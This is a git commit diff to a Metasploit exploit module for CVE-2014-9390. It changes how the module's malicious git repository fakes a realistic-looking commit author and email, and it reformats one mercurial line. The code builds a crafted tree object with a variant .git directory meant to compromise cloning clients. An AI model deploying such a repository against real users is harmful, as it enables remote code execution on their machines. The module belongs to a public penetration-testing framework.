Use Rex::Text.rand_mail_address for more realistic fake commit

jhart-r7 · jhart-r7 · commit 51049152b692 · 2014-12-26T10:39:52.000-08:00
diff --git a/modules/exploits/multi/http/cve_2014_9390.rb b/modules/exploits/multi/http/cve_2014_9390.rb
@@ -180,19 +180,16 @@ def setup_git
     git_dir = '.' + variants.sample
     sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
     @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
-    # build the supposed commit that dropped this file
-    # a random user and user name
-    user = rand_text_alphanumeric(3 + rand(10)) + ' ' + rand_text_alphanumeric(3 + rand(10))
-    user_name = user.downcase.gsub(/\s+/, '_')
-    # random company
-    company = (rand_text_alphanumeric(3 + rand(10)) + '.' + %w(com net org).sample).downcase
-    # random commit and author time stamps
+    # build the supposed commit that dropped this file, which has a random user/company
+    email = Rex::Text.rand_mail_address
+    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
+    full_name = "#{first.capitalize} #{last.capitalize}"
     tstamp = Time.now.to_i
     author_time = rand(tstamp)
     commit_time = rand(author_time)
     tz_off = rand(10)
-    commit = "author #{user} <#{user_name}@#{company}> #{author_time} -0#{tz_off}00\n" \
-             "committer #{user} <#{user_name}@#{company}> #{commit_time} -0#{tz_off}00\n" \
+    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
+             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
              "\n" \
              "Initial commit to open git repository for #{company}!\n"
     if datastore['VERBOSE']
@@ -226,7 +223,7 @@ def setup_mercurial
     fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'
     @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n"
     # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat
-    @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0'*40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
+    @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
 
     # TODO: finish building the fake repository
   end
